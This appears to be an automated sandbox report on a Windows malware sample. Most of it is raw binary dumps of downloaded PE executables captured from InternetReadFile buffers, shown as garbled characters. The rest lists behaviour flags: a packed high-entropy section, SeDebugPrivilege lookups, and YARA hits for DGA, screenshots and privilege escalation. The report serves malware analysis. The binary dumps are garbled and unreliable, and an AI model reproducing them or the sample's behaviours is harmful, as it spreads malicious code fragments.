HXH0èl¶WÀPH`HhA¸H2HPè:¶WÀpHHA¸HHpè¶WÀH H¨A¸ HâHèÖµHD$0HD$ H°HD$(HT$ H #Kè`L Öcº A¸HL$0èeVH z¦H$ÀHÄ°]éAYÌHì(H ),èDH ¦HÄ(é YHì(A¹HÓ-E3ÀH Y-èH a¦HÄ(éðX@SHì ¹èÔéH -HØèuH¾E3ÀHÓH-H z-èµ H f¦HÄ [é XH5Læ,L§5HÒtHHcHLDPL5H5HÒtHHcHLDPÃÌÌHì(H ,è\H ¦HÄ(é8XH ¦é,XH Q¦é XHì(A¹H.E3ÀH .èH e¦HÄ(éðW@SHì 3Éè×èH Ð-HØèxH½E3ÀHÓH´-H -è¸H m¦H request_handle: 0x00cc000c	1	1
InternetReadFile April 21, 2025, 10 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $$2â`å\±`å\±`å\±Ôy±hå\±Ôy¯±ëå\±Ôy®±må\±à¡±bå\±àX°rå\±à_°jå\±àY°Yå\±iß±iå\±iÛ±bå\±iÏ±gå\±`å]±Cä\±îY°Rå\±î\°aå\±î£±aå\±î^°aå\±Rich`å\±PEd#@fð"!h8à.@`Á 4ÔP`ã l0ðp À6T7(ð³@¼ .textngh `.rdataÄ(*l@@.data\ç°@À.pdatal0 2°@@.didat`àâ@À_RDATA\ðæ@@.rsrc`ãäè@@.relocp ð Ì@BH 9¹éÌÌÌÌH Éùé¸¤ÌÌÌÌHì(H 5ùèdH ÉeHÄ(é¸H Éeé¬ÌÌÌÌHì(èÌájHÄ(ÃÌÌÌÌÌÌÌÌÌÌÌÌH éjéûÌÌÌÌH ÙeélÌÌÌÌH Ùeé\ÌÌÌÌHì(H lèØ¦H ÉeHÄ(é8H Éeé,ÌÌÌÌH ÉeéÌÌÌÌH ÉeéÌÌÌÌHì(H ¥kèTH éeHÄ(éèH )féÜÌÌÌÌHì(H ÅlèH fHÄ(é¸H fé¬ÌÌÌÌH\$Hl$Ht$WHì0HñIØIÈHú3íèhLÀHÓHÏè¯DE H.HÐHnHÎHnHØè$HkHÆHt$Pf+Hl$HHÇCH\$@HÄ0_ÃÌÌÌH\$Ht$WHì0Hù3öHJHÚH;Js!HzHAHBHÂrHfDHftHëE·ÈºDÆHËè"A¸ H7HÓHwHÏHwè$HsHÇf3Ht$HHÇCH\$@HÄ0_ÃHì(HA'H;Áv'HÈè[HÈHÀtHÀ'HààHHøHÄ(ÃèqfÌèçÌÌÌH\$Hl$Ht$WAVAWHì I¾þÿÿÿÿÿÿIØLúHùM;ÆÌHÇAHûsHYHÛLÃèS#3öf4;éHÃ3öHÈI;ÆvH¸ÿÿÿÿÿÿÿHë.¹ LðH;ÁH¸ÿÿÿÿÿÿÿLBñINH;Èw^HÉHùr èÿÿÿHèëHÉtèxëïHîH_I×HÛH/LÃLwHÍèÇ"f4+H\$@Hl$HHt$PHÄ A_A^_ÃèåÌècÌÌÌHÒH\$Ht$WHì H¸ÿÿÿÿÿÿÿHñH;ÐwoHHûr HËè}þÿÿHøëHÛt HËèÛ ëì3ÿH>H;H~LÃ3ÒHFHÏèÛ(Hd$0H;HL$0HFèOH\$8Ht$@HÄ _ÃèÖÌÌH\$WHì HÚIøH+ÙHÑLÃHÏèÛ!H;H\$0HÄ _ÃHÄHXHhHpHx ATAVAWHì H»þÿÿÿÿÿÿMùLòHùH;ÓHiHÊE3äH;ÓwHÍHÃHÑéH+ÁH;èvH¸ÿÿÿÿÿÿÿHë1H)HÚH;ÐHBØH¸ÿÿÿÿÿÿÿHKH;È HÉHùr èLýÿÿHðëHÉtèëïIôH_I×K6LwLÃHÎèþ fD$3Hýr1HHmHúrLAøHÂ'I+ÈHAøHøw3IÈèH7HÇH\$@Hl$HHt$PH\|$XHÄ A_A^A\ÃèØ ÌèVcÌèP ÌÌÌÌH\$Hl$Ht$WATAUAVAWHì LqH»þÿÿÿÿÿÿHÃMéI+ÆHñH;Â@HiM<I×E3ÀHÊH;ÓwHÍHÃHÑéH+ÁH;èvH¸ÿÿÿÿÿÿÿHë1H)HÚH;ÐHBØH¸ÿÿÿÿÿÿÿHKH;ÈéHÉHùr èûûÿÿHøëHÉtè\ëïIøHD$pO6LðL~H^M$8HÏL<HýrSHHÓèMÇIÕIÌè3ÀHmfBwHúrHKøHÂ'H+ÙHCøHøwMHÙHËèëHÖèGMÇIÕIÌè93ÀfBwH>HÆH\$PHl$XHt$`HÄ A_A^A]A\_ÃèÎaÌèÈÌè>ÌÌH\$Hl$Ht$WATAUAVAWHì LqH¿þÿÿÿÿÿÿHÇE·ùI+ÆHñH;ÂHiM$IÔE3íHÊH;×wHÍHÇHÑéH+ÁH;èvH¸ÿÿÿÿÿÿÿHë1H)HúH;ÐHBøH¸ÿÿÿÿÿÿÿHOH;ÈÇHÉHùr ènúÿÿHØëHÉtèÏ ëïIÝMöLfH~MÆHËHýrIH>H×èHmfE<fElHúrHOøHÂ'H+ùHGøHøwCHùHÏè¨ ëHÖèÒfE<fElHHÆH\$PHl$XHt$`HÄ A_A^A]A\_Ãèc`Ìè]ÌèÓÌÌÌ@SHì HÙHÂH ÅWÀHHSHHèsHÀHHÃHÄ [Ã@SHì HÙHÂH WÀHHSHHè7HHHÃHÄ [ÃHaHLpHAHùHHÁÃÌÌ@SHì HÙHÂH -WÀHHSHHèÛHÃHÄ [ÃÌÌ@SHì HHÛtIHHÉtAHSH+ÑHÑúHÒHúrLAøHÂ'I+ÈHAøHøwIÈèGH#HcHcHÄ [Ãè&_ÌÌé»ÌÌÌ@SHì HÙH HÉtAHSH+ÑHÑúHÒHúrLAøHÂ'I+ÈHAøHøwIÈèàH#HcHcHÄ [Ãè¿^ÌÌÌH9HHÁéÌÌÌÌÌH\$WHì HHùHÚHÁèZöÃt ºHÏèxH\$0HÇHÄ _ÃÌÌ@USVWAUAVAWH¬$PÿÿÿHì°H³£H3ÄH IÙIðLúLñE3íLmfoÖnóEfDm¿MÉÊLmàWÀóEðHËèf^LÀHÓHMàèw÷ÿÿE3ÀHUàHM`èöÿÿLÃHÐHM@è öÿÿE3ÀHÐHM èvöÿÿHÐHxrHL@HMèÃHM è%HM@èHM`èHUøHúr2HUHMàHÁH;×rHÂ'HIøH+ÁHÀøHøèè@¹£è HØLmàWÀóEðHÈè]LÀHÓHMàè öÿÿE3À request_handle: 0x00cc000c	1	1
InternetReadFile April 21, 2025, 10 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEdchð" `h@@`s (ð )È p- ( Å @(v ð.text `.rdataÄó° ô¢ @@.dataX;° @À.pdata)ð ª @@.B1J Ô `.gxfg@ ò @@.retplne`.tls p@À_RDATAô@@.relocÈ @B.jssL L"@À.jssLð Ln @ÀAWAVAUATVWUSHìH¦£ H1àH$I³ -G³ Xÿ¯ØØ÷Ðàþó ÃûÿD$vAÀAÁý AÂý D$wÃE ÂAØE0ÈA ØD ËDÓDÀ0Ø½ùÉÄ¸lß¦EÅÛDèÖIÎEÀDèA¹lß¦LQ¸4_3YA¸è¯;f=ç¯;)=lß¦t=ùÉÄuëé§¸è¯;=ç¯;~áf.=è¯;ts=4_3YuÂ¶D$vD¶\$wÂòÑ ÁñÃ0ËÁñÙÈD ÙAó4D ØÁÐD ØA0ÓAÃDÚ0ÊAöÃ¸è¯;AEÁöÁADÁöÒöÂAEÀ=ç¯;_ÿÿÿëLT$xè=ç¯;KÿÿÿéoÿÿÿH\|$xLñè ð± DyÿD¯ùEüA÷ÔDââ4Ú0¹EøAàË%ÏFA ÐAð5Ú0¹E àAøÿD$v ·± ÃL$ ù ÁD$w0ËÚöÒ ÊÙ0ÑÛ½ùÉÄ»lß¦EÝÒºlß¦DÚHD$@ÉEÝ\$$A÷ÐInº4_3Y¸è¯;fúç¯;(úlß¦t úùÉÄuèëwºè¯;úç¯;~áfúè¯;tBú4_3YuÀ¶L$v¶T$w0ÊÓó ËÙ0ÑöÁ¹lß¦EÈöÂÊEÐöÃDÑúç¯;~ë¶Hl$xT$$úç¯;yÿÿÿëø÷Ð%fp=AúAâbÂA Â÷ÖAòfp=A òDÐ÷Ð1þ÷Ö!þñ÷ÑDÒâï#%üÜa ÐA Êáï#æüÜa Î1ÆA÷ÒA òH\|$xHÁïDà%Û 'EùAá$ó_ØA ÁAñÚ 'E áAùÿÁD$ ø AÃø ÀÃ Ë0ÁËÚ0Ê¾lß¦ºùÉÄEÖÛ»ùÉÄEÚÉDÚ\$4DááþAçA ÏE1üEüÁÂ ÂA ËAÓÂ Ê0ÈÐÁD0Ù¹ùÉÄEÎºùÉÄÀEÑ\|$LEÛDÑT$0A÷ÑA½B~ÇD$(Hl$8Aý&¦")é÷HD$xA½±¾R-f.fAý&¦"ÓAýF`<¶Aý"Ñb^AýG`<CAýÿÍ<SAýÏFu¶,¯ ¯ Pÿ¯ÐÐ÷Ð% ¬Xâ_éS§ ÂÐ5^éS§àþò¡¬X ÂúÿÀÂù Ãù Á ÈÑ ÓÃØ0ÈÛA½U¯Âº±¾R-DEêÉ¹U¯ÂDEéÀéÍf.Aý°¾R--Aý'¦"ÊAýè°²+ïAýHiý+üþÿÿr® p® Pÿ¯ÐÐ÷Ðàþò ÂÐ÷Ð%ã7ât{È Âòt{ÈÀÂù Ãù Á Ê ÃÓÊ0Â ÁÑÈ0ØÉA½hÑ¸¹ïxDEéÛDDéD\$pÀ¸hÑ¸éAý#ÑbAýïx'AýXõð{TþÿÿHD$XHøA½G`<¸Hiý+DDèE1ÛAý&¦"9þÿÿf.fAý1¼AýÒß½øqAý2¼øAýU¯ÂAý0ößýÿÿEüD$LD$LD$LD$LD$LD$LHD$@D$v\|$ D$w¸4_3Yf.=ç¯;)=lß¦t=ùÉÄuëém¸è¯;=ç¯;~áf.=è¯;tK=4_3YuÂ¶D$v¶L$w4ñÂÊ0ÁÐ0È¨¾è¯;¸lß¦EðöÁð¹è¯;EÁöÂEÆ=ç¯;~ë®Hl$xD$0=ç¯;qÿÿÿëAýv9Ø°)Aýw9Ø°êAýã+n¸AýhÑ¸ÌüÿÿHD$P¾8L$pÊ÷ÒÐ%%á\à ÁÎöÀñh!Ê]ë7Ð÷Ðû÷Óýõ]ë7!Ýç¢xÈáJ/l1æÀ ÎâJ/l1% È Ð1ðé!ù1ïHl$8 ÏÁ÷Ñ!ù÷×!Ç ÏiÇéÑ[\|$hù÷ÑÊ Â÷Ð÷ÒáO¹ç°ãóF Ï÷O¹ Ç÷×Ð!ø1× Ç« « Pÿ¯ÐÐ÷ request_handle: 0x00cc000c	1	1
InternetReadFile April 21, 2025, 10 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $A!S@@@±Ü@±Üy@±Ü@Ü"\|@Ü"{@Ü"z#@8ü@8ì@@~PA¡#zN@¡#@@è@¡#}@Rich@PELZà t¦â°@P@´´Ð:ü=PvT¤v0p@°à4.text7 `.rdata`í°î@@.data0 @À.wixburn8À@@.rsrc:Ð<@@.relocü=>Ô@B¡°D£8¶FÃ¡°D£@¶FÃ¡ °D£X¶FÃ¡°D£D¶FÃ¡°D£H¶FÃ¡°D£<¶FÃ¡°D£L¶FÃ¡°D£P¶FÃ¡\|°D£T¶FÃ¡T³D£Ü¶FÃÌÌUìì0¡ F3ÅEüS]3ÀVuWPEÐÏÿEÔEÔPÇEØ`´DÇEÜx´DÇEà´DÇEä ´DÇEè¸´DÇEìÐ´DÇEðè´DÇEôµDÇEøµDèê"ÀxjhjjjhÿuÔÿä°DøVè@Àtèïëj EØPè[EÐPÿuVWSèl@ðÿÿtWÿà°D}ÔtÿuÔèñDöxuÐMüÆ_^3Í[èÏå]ÂUìEÀüPÿì°D]ÂUìQSVW3öVVjVuüÿð°Dh8µDÿø°DØhLµDSÿè°D=ô°DÀt hÿÐÀu9ÿ×hhµDSÿè°DÀth4µDÿÐÀuÿ×9uv}EüPÿ4·è7&F;urî_^[å]Â3ÀPPjPÿð°DÃUìQQVW3ÿEüWh\|µDP}ü}øè½ðöxbWÿuEüPèªðöxOEøPÿuüÿL³DÀu-ÿô°Dðö~·öÎöx¾@VjchµDè¤%ëHEEMøI9}ütÿuüèC_Æ^å]ÂUìQSVW}3Û3ö]ü9t1ÿ7è)ðþÿu ¸WéEüÑîPhÿÿÿÿ7èÔ Àxn]ü}ÿuEPhÿÿÿÿuèµ ÀxO}ÎG+Ë;Èsÿu;]4EVSèÀx&ë];thjjWÿuVÿ3èYë¸ÿÿ_^[å]ÂUììeüSVuW3ÿ!}ø}ô9>t,ÿ6èO(ø}ôÿÿu ¾Wéÿ6ßÿ±DÑëEøuÿu»SVèðöxt}üÿuEÿuSÿ0è! ðþzuEÿu8Mø 3ÒfOÿuÛSPè@ðöx3öFþt¶Ç}ü}ôÀt}tÈÿt ÆAïu÷Pèä%_Æ^[å]ÂUìEV=ÿÿÿr¾ë]W}À?t-3ö9utMuQVPÿ7è¡&ðöx4EëVPÿ7èh&ë jPè½$3öÀu¾Vjmh µDèw#ë_Æ^]ÂUìESV3öËÿ90tÿ0è'ð;óu¸Wë[ÑîW}ÿuÿuÿ±DøO;ÏrÙÀ%;Ïr1;ósÿuóS]Sè&ÿÿÿÀxë]hjjWÿuVÿ3è_^[]ÂUìfEj0Yf;Èw fø9wÁëjaYf;Èw føfw,Wë,7]ÂUìMEÉx3Àëÿ¸]ÂUìS]VW}WÿuSèóðöx`ÿuEPhÿÿÿÿ3èþðöxF}Wÿ3Wÿ3ÿujÿ±DÀu.ÿô°Dðö~·öÎöx¾@Vhq h µDè"_Æ^[]ÂUììE V%W}Eôt8M3öÉuÿuÿÿÿÿv¾WöxÿtEPWQèêðEë'3Àë&3öÿtÿÿÿÿv¾Wöx EPWÿuëÏ3ÀMEüöSß+ØU}ÿÿÿ]ør ¾Wé§}ôMt Éu e¹µDE 3ö©àÿÿt M¾Wë~ûw&9u 9Mñ÷Þöæ#ÆWëSÿu!uEQPSRè.UðU+]U]øöx&M ÷ÁtQûvLCÿP¶ÁPBPèáÄë3ME ©tÿtPEøPEPÿuüWQè,]øöyþzuUEÀtEÀt[_Æ^å]ÂUììE V%W}Eôt<M3ÀðÉuÿuÿÿÿÿv¾WöxÿtEPWQèUð3Àë)Ðë(3Àðÿtÿÿÿÿv¾Wöx EPWÿuëËÐMUüöSßQ+]ü}ÿÿÿU]ør¾Wë(}ôMtÉu¹4µDE÷E àÿÿðt[¾WME ©tÿtPEøPEPÿuü?PQè å]øöyþzuUEÀtEÀt[_Æ^å]Âûw}tØf9tÓMñ÷Þöæ#ÆWëÿuEEQPSRèMðU+Ù]øJUöYÿÿÿM ÷ÁtûvøvÿÿÿÀþP¶ÁPBPèßÄéZÿÿÿUìQQU ¹ÿÿÿSVÂ3ö%»WW}EøtEÀuÿu;ùvóë3öÿt;ùvóEößE]ü9Mr¾Wÿ´Æé¬}øMt Éu e¹µD3ö÷Âàÿÿt¾WÿÆë~ÿu#9u¡9ð÷Þöæ#ÆWëWÿu!uQMQWPèMðEß+Ù]üUöx,U ÷ÂtûvCÿP¶ÂPE@PèwÞEÄöy0M ÷ÁtÿtQMüQMQjWPè]üöyþzuEÀtMEÀt_Æ^[å]ÂUìQQM 3ÒSÁ»WV%òW}Eø¸ÿÿÿtUÒuÿu;øvóë ÿt;øvóUö/ßU]ü9Er¾WÿÉ3Àfé¿}øEt Àu e¸4µD3ö÷Áàÿÿt¾Wÿ3Àféÿu%9u²3Éf9§ò÷Þöæ#ÆWëeÿu3ÉPEMPWRèiMðUß+Ù]üJEöx6M ÷Át'ûv"øvÀþP¶ÁPEÀPèðÜUÄöy33ÉE © request_handle: 0x00cc000c	1	1
InternetReadFile April 21, 2025, 10 a.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ù\ZîZîZî_îìîKîKhPîKhKîKhîSîZîÎî¢i[î¢ih[î¢i[îRichZîPEd²Fhð"+´ÖPv@Ð`\ d°àp3ÀÜ `½p ¼@Ð.text¨³´ `.rdatab\Ð^¸@@.data¤50@À.pdata3p4.@@.rsrcà°b@@.relocÜ Àd@BH\$UH¬$0ÿÿÿHìÐWÀD$03ÛH\$@H\$HA¸HHL$0è ¿WÀD$PH\$`H\$hA¸HpHL$Pèv¿WÀD$pH]H]A¸HLHL$pèN¿WÀEH] H]¨A¸H)HMè(¿WÀE°H]ÀH]ÈA¸HHM°è¿WÀEÐH]àH]èA¸HåHMÐèÜ¾WÀEðH]H]A¸HÃHMðè¶¾WÀEH] H](A¸H¡HMè¾WÀE0H]@H]HA¸HHM0èj¾WÀEPH]`H]hA¸H]HMPèD¾WÀEpHHA¸H5HMpè¾WÀH H¨A¸H Hèæ½WÀ°HÀHÈA¸HàH°è´½HD$0HD$ HÐHD$(HT$ H SèlhL ´kº A¸ HL$0èC^H ØH$àHÄÐ]éaÌÌÌH\$UH¬$PþÿÿHì°WÀD$03ÛH\$@H\$HA¸H>HL$0è½WÀD$PH\$`H\$hA¸ H HL$Pèæ¼WÀD$pH]H]A¸HHL$pè¾¼WÀEH] H]¨A¸HñHMè¼WÀE°H]ÀH]ÈA¸H×HM°èr¼WÀEÐH]àH]èA¸H½HMÐèL¼WÀEðH]H]A¸H£HMðè&¼WÀEH] H](A¸HHMè¼WÀE0H]@H]HA¸HkHM0èÚ»WÀEPH]`H]hA¸HUHMPè´»WÀEpHHA¸H1HMpè»WÀH H¨A¸ H HèV»WÀ°HÀHÈA¸HèH°è$»WÀÐHàHèA¸HÂHÐèòºWÀðHHA¸HHðèÀºWÀH H(A¸HzHèºWÀ0H@HHA¸ HXH0è\ºWÀPH`HhA¸H6HPèºWÀpHHA¸HHpèø¹WÀH H¨A¸HâHèÆ¹HD$0HD$ H°HD$(HT$ H Oè~dL Ægº A¸HL$0èUZH ªH$ÀHÄ°]é1]ÌÌÌÌÌH\$UH¬$PþÿÿHì°WÀD$03ÛH\$@H\$HA¸HJHL$0è ¹WÀD$PH\$`H\$hA¸ H(HL$Pèö¸WÀD$pH]H]A¸ HHL$pèÎ¸WÀEH] H]¨A¸HùHMè¨¸WÀE°H]ÀH]ÈA¸HãHM°è¸WÀEÐH]àH]èA¸HÉHMÐè\¸WÀEðH]H]A¸H«HMðè6¸WÀEH] H](A¸HHMè¸WÀE0H]@H]HA¸HwHM0èê·WÀEPH]`H]hA¸H1HMPèÄ·WÀEpHHA¸H-HMpè·WÀH H¨A¸H Hèf·WÀ°HÀHÈA¸HèH°è4·WÀÐHàHèA¸ H¾HÐè·WÀðHHA¸HHðèÐ¶WÀH H(A¸HzHè¶WÀ0H@HHA¸ HXH0èl¶WÀPH`HhA¸H2HPè:¶WÀpHHA¸HHpè¶WÀH H¨A¸ HâHèÖµHD$0HD$ H°HD$(HT$ H #Kè`L Öcº A¸HL$0èeVH z¦H$ÀHÄ°]éAYÌHì(H ),èDH ¦HÄ(é YHì(A¹HÓ-E3ÀH Y-èH a¦HÄ(éðX@SHì ¹èÔéH -HØèuH¾E3ÀHÓH-H z-èµ H f¦HÄ [é XH5Læ,L§5HÒtHHcHLDPL5H5HÒtHHcHLDPÃÌÌHì(H ,è\H ¦HÄ(é8XH ¦é,XH Q¦é XHì(A¹H.E3ÀH .èH e¦HÄ(éðW@SHì 3Éè×èH Ð-HØèxH½E3ÀHÓH´-H -è¸H m¦H request_handle: 0x00cc000c	1	1
InternetReadFile April 21, 2025, 10 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL£wLgà "&è+%@@p(ÜÕ'è!d`(D V(@° .text© `.rdata@@@.data@?à@Àss0 `ss18°@Àss2À `.rsrcD `(@@Æ'&9(úÎ# éR h¡9Åd$Ýçh"S_D$f3óÁl$¸öT$fÿÎÀt$æÁd$fö7dfÿÆèh²°7¸h)k?fò7dÀD$¦h=Lfh` (é´þÂ¨U,®n»¹¶~IÄËOBDjóë?«?\|$&ÀUHEÁýeT »cHØç»^ÏÒêà±²hQÃQ/Ü¯ÃÕÉ¬ÛN8UTÀ~Ý$\Ë§!2°ôÀ've_> Å_#úªÙX$¡vÞêE^ ÿ%¿ GÊ8³B:Y_vèä2æ?«Ç§ÆÖ(Bù×ÀT8¾VÑ·À[èãjcÃðP/sæ`#yåÐhS¹ã ue¤÷Õ è7`<êïÈ¦Èebú.ÊäñÒ2;TÉ6ËwäMhJRÞ ÃÝe3§²áÙ8_÷zÛY5««nG²ÒkÂÀ(Û=!ª 2¶Ã¨üóÙdß'§¬ õ°qïtûeSLTêõ#)ýéÇ` OâN¸ÙººöÁ<@xàÑ(7^8`À[ºÀºl8Ñ÷}À%Í>4 ¿ToþV=ÉÐA=§ÊJ{=_$yUé(`DÆû¸ÜvLt{ ùæ¡tûÔt[vÔÚæéE.zlÑ÷.æfW´Ge×¼ZXÙ-(ûVa§_$6}ñt{¯v@Ì)ÏÆ´jôNü®õ@üý]JâåÉsçL³U½ð³[é óÑÈSÂTh¥HÕ0¸»nÎùQ.r×Z§K,¿{U§zéUÿÊèÿWhÕîÙ¿ÂT5x¡ØxcÓÌ=IÈ%éà®:³<CØý)êêÓºtImb¯0joüô zo`ÉþwLV¢ )Ñ $ ;8ßzC/ÁÌûFÑç¯þÄÌ{£lØ]tÌûþëFg:UFýÓéuêáéå.»ò9U Ä¦Lä½$ÔíoÀs~V2hóoj½XÆÉñÙ7¿¥tdÀþj_°MpAvÞ¥K)K²/[úTEã?·ùúÀLû]í«<2z+L{O±º,@ÍÏ[Á°µ ¸³` ¦ÁÀáH6°MíÕÄè¤üi¬I6®äxEzµúÁÃ^¯[^àÙùý$s£]BÇ36ÕP¨Z³`Ýam.¦¥Â[L{_ºü¿éioLûä%§{uU[»L{ßP} Uóc^öåmÆýÛ·.³.Zß:êóUÉôË3ÕwÉIBã_á¹´Lûû»%qVÃ¡óÄ&Û3IÕð(£Ä¨I5´//ÜÈùb>Ì%?úùuÄT/ÿ2á×TÌó[t(±Íåm\"¶·$Ü¾ù1;àÔ ¶þ¬àÑyð!ÄTÛðX#wö/Ê~GÜdo¿Üfòõ3ú;y éð±èé$÷¶ÑfÿÀºø;ó¸9ã8é~fh¨èA»¸XA·ËIâQÇLàþÿþQN¤þGs§D·Ìp?úÿN´Hs§AòA¿ú¸,NJ¬Hs§DÉéÃX¾Rk¨eú§ù ©SsÒxM`L Hf&gØIÊ«d´ÑøÀäáúÀpæWçÖðdUõÊbMì%À%GËÊYh´ê/B\|$³ïHÇD$xnÞ8ÿt$Hd$è^üâ6Õ-ä{¢mwªadrëÄü?ÑùÌ`ÿÆÊ¶¸bU¬ü/¦[¹-xûg,¯û.û ýp¡,¯{ëêf=L>ît1ójÓP â¹ ØÀ;½Ã7T¥Û#»2Ï$.²ï¯Ö/,¯û5æåßÓPtìpSiÓP&ªÍ<¶3#;,éw¤}K¦{ãÒ¤0-âJI°ÌJÞ60©ø[ÖÙ§ $ÎL×ÆT»;RcUÁ?Àeà¤ê~{Ðå ©Âý2ye'zËXÅ4L'AÆTrº¿è@+î/Ê:-¹à@{ËÈM¦8Ôrtièªúú'Ä"Ê¥WQÆT¸4Ñ5FÚÀg\|Ì¿ë^:ï ÒãÉRBncm.Á¤Á2Ì6éU>ÚdðÉ ÔGµêÐ@¶·ð$8¯G<ÁM«Ø29ÇÇ[Xa#g²W·ßÇ9¯Gn¬9k®3ÆQøõ{Tüâ{9«ÿWÞñÆPx!èpöôÀ9®Q¬/ãEÆ[àªÅÅ»/¾Ímb>£×nó"TÀõSmáN£¢>W®ìAfÙ[wmqh³¬¨5AàhéEªx«b`gx þ:[=dcZvbâºÇ é¯¢:ªÒã}}bÀö^KQñpL/)1øx> ç Ç,-õp{àí}^¢$pûzá2ëÑp{>»¡ìPÚc"Uéýrz½X¸ã~ÞÑy ±}£oc`AàÄÇÆdyûÈT`Q-uê~;£À`X¾Ú;ÖVÅ)Êþ]ëÃPa®xuèªV0ÈT}L§KäËR.ïæß´ÇD$Ú(ÐÊéË¹¿E4"f»ÉQHL$AL"ÀD$ HÁt$ IÒfÁd$cè;Ã9rÐjXOU\|6-0N] «÷zñæº¡;Íq\º¯ãi¢l49uña®,VNe¸8$Ë\|ãÇ ¹9½GÃCk8ê·¬/,K:«H ½g¯â@esJóÑ#äÔ!#-vg5û#ºßf_I N§òÙ;QgÖÀsúÙv¹÷+Øþçn¦² request_handle: 0x00cc000c	1	1
InternetReadFile April 21, 2025, 10 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEdQùhð"x3@0ìk``<( ¼ T(&l «@H?À.text `.rdatadÀ Â@@.dataØ(pN@À.pdataT \@@.B8 Àv `.gxfgpÐ@@.retplneð_RDATAô@@.relocl@B.jssv v¤@À.jssv v @À.rsrc¼ @@AWAVAUATVWUSHìH¦`H1àH$õl-ólxÿ¯øû÷ÓçQemØ%÷® ø5ö®ãþ ÃûÿD$:ý D$;T$4IÌ¸ÞwAºhÍÅ A»ñdo¾¶ÓÆ=9ëëmlHÿ¯ÈÈ÷ÐÂâþá Ñ÷Ñ ÁùÿÀ=kl Á0ÈÂöÒ ÊÁ0ÑÀ¸gÅe;½D2ÚYEÅÒºgÅe;DÂÉEÅf.=9ë%=»þX^=fÅe;Ä= òu<=òu<=ÎÍ@³ =ñàòCu»Dl$pDt$tD$LL$t9Á¸¹Ì³¹><â;é«=çékQ=É\|t$=É\|t =üBy =ÞwYÿÿÿD$:L$;Âò0ÈñÑÂ0Ê¨¸övòè½òu<EÅöÁ¹övòèEÁöÂé²=a+P=®9ë§þÿÿ=½uÍþþÿÿHD$XHø¸¼þX¹±LÁE1ÿ=9ëåþÿÿf.=¸Ì³I=±e÷£I=8©5=9©Ú =kT&« =p þÿÿ¸µ´X=9ë~¶éþÿÿ=õvòè>=z«þT=z«þ3 =±6 =BZûIþÿÿ¸©{@¼=9ëiÿÿÿé?þÿÿ=_E[O=¼þXZ =D2ÚYþÿÿ =j=;jQÿ¯ÑÑ÷Ñá(Íâsì×2 ÊÑñsì×2ò(â·ùÍåHø ÕõIøáþ éÊ÷ÒâHMÏá·²ç0 Ññ·²ç0ÁÀÿ Ãÿ Â ÑÂ ÃËÙ0ÑÛ¸ÎÍ@½µ´XEÅÒºÎÍ@é=´´X==ç°<¾ =MTýÿÿ¸.cÁL$dL$,=9ëlþÿÿéBýÿÿ=.cÁ=¹Ì³® =©{@¼ýÿÿ @i=>iQÿ¯ÑÑ÷Ñáõ¿A+â @¾Ô ÊÕõ @¾Ôò¤¹â¬¹ éáSF_ø ÑñRF_øåþ ÍýÿÀÂÿ Ãÿ ÁÑ0ÃÈ0ØºïÄ6©¸BZûEÐÛÐ½ïÄ6©EÅÉEÂ=9ë³ýÿÿéüÿÿ=²e÷£6=ïÄ6©hüÿÿ¸ñàòCE1öDl$<=9ëýÿÿéVüÿÿ=gÅe; =><â;5üÿÿHcD$tHL$@iéÑ[ÈÁèÅ÷Õêâ5Làä ÐÊ÷Ò55L ÐÃ÷Óâp×ñál( Ññp×ñ éÊ÷ÒÅåjiãue ë Èájiâu Ê1Ú÷Ð ÐiÈéÑ[iD$péÑ[÷ÐAÅA ÍDê÷Ò1È÷Ð!ÈÁ÷ÑDíå^Ð?â¡/xÀ êA Íá^Ð?%¡/xÀ È1ÐA÷ÕA ÅDt$tAÆ¸ñàòC=9ëüÿÿéaûÿÿ=èék) =¥Æq@ûÿÿjgHÿ¯ÈÈ÷Ð%÷Ýáã" ÁÈ5ã"ñ£4]á«4Ñ]ÂâTË.¢ ÊòUË.¢àþ ÐøÿÀ="g Á0ÈÂöÒ ÊÁ0ÑÀ¸É\|t½üByEÅÒºÉ\|té²úÿÿ=b+j =7v7®úÿÿ$$$$$$$$$$fHÿ¯ÈÈ÷ÐÂâþá Ñ1ÈÈÀ=tf Á0ÈÂöÒ ÊÁ0ÑÀ¸EÝô½p EÅÒºEÝôéúÿÿ=övòèÙ=¯U#êúÿÿHD$XHø¸½uÍ¹ç°<LÁ=9ëûÿÿéåùÿÿ=`E[É =8`gÄùÿÿ îe=ìeQÿ¯ÑÑ÷Ñá^;Xâ¡óÄ§ ÊÕõ¡óÄ§òX"PâøâfÕéá* Ññ*åþ ÍýÿÁÀÿ Ãÿ Â ÑÂ ÃËÑ0ÙÛ¸gÅe;½®9ëEÅÒºgÅe;EÂT$0$é·=µ´XO =EÝôùÿÿ$$$$$$ request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0020d800', u'virtual_address': u'0x0000c000', u'entropy': 7.984002744358319, u'name': u'.rsrc', u'virtual_size': u'0x0020e000'}

entropy

7.98400274436

description

A section with a high entropy has been found

entropy

0.984773951745

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW April 21, 2025, 10 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 9:53 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 9:53 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 21, 2025, 10 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Expresses interest in specific running processes (1 event)

process

system

Potentially malicious URLs were found in the process memory dump (3 events)

url	http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url	http://purl.org/rss/1.0/
url	http://www.passport.com

Yara rule detected in process memory (50 out of 96 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
